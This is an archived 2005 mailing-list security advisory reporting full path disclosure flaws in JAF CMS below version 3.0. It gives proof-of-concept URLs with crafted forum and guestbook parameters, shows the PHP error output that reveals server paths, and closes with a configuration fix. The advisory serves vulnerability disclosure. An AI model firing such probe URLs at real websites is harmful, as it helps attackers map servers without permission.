Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[ECHO_ADV_20$2005] Full path disclosure JAF CMS

from [the_day] Network Security [Permanent Link]
Subject: [ECHO_ADV_20$2005] Full path disclosure JAF CMS
Date: 23 Jun 2005 09:21:43 -0000 
---------------------------------------------------------------------------
[ECHO_ADV_20$2005] Full path disclosure JAF CMS
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: June, 23th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv20-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JAF CMS
version: < 3.0 Final
URL  : http://jaf-cms.opensource-indonesia.com
Author : Salim "ph03y3nk"
Description :

JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

   A remote user can access the file directly to cause the system to display  
   an error message that indicates the installation path. The resulting error 
   message will disclose potentially sensitive installation path information 
   to the remote attacker.

  * http://victim/index.php?page=forum&category=general&id=[id]/*

  POC :
  
  http://localhost/jaf-cms/index.php?page=forum&category=general&id=3/*
  
  Warning: fopen(module/files/3/*): failed to open stream: No such file or 
directory
  in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197


  * http://victim/index.php?page=forum&view_type=topic&id=/*

  POC :

  http://localhost/jaf-cms/index.php?page=forum&view_type=topic&id=

  Warning: fopen(module/files/): failed to open stream: Is a directory 
  in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197


  * http://victim/index.php?page=guestbook&disp=[id]/*

  POC :
 
  http://victim/index.php?page=guestbook&disp=[id]/*

  Notice: Undefined offset: 6 in 
/var/www/html/jaf-cm/module/guestbook/guestbook.php on line 250


B. Fix
  report to vendor 21 June 2005
  vendor No response

  For User and do not know how to fix the script , change php.ini file setting 
  then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     the_day || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Buffer overflow vulnerability in VERITAS Software Backup Exec Web Administration Console (BEWAC), NGSSoftware Insight Security Research
Next by Date:  Vulnerability Statements, Mark Litchfield
Previous by Thread:  Buffer overflow vulnerability in VERITAS Software Backup Exec Web Administration Console (BEWAC), NGSSoftware Insight Security Research
Next by Thread:  Re: [ECHO_ADV_20$2005] Full path disclosure JAF CMS, Steven M. Christey
Indexes:  [Date] [Thread] [Top] [All Lists]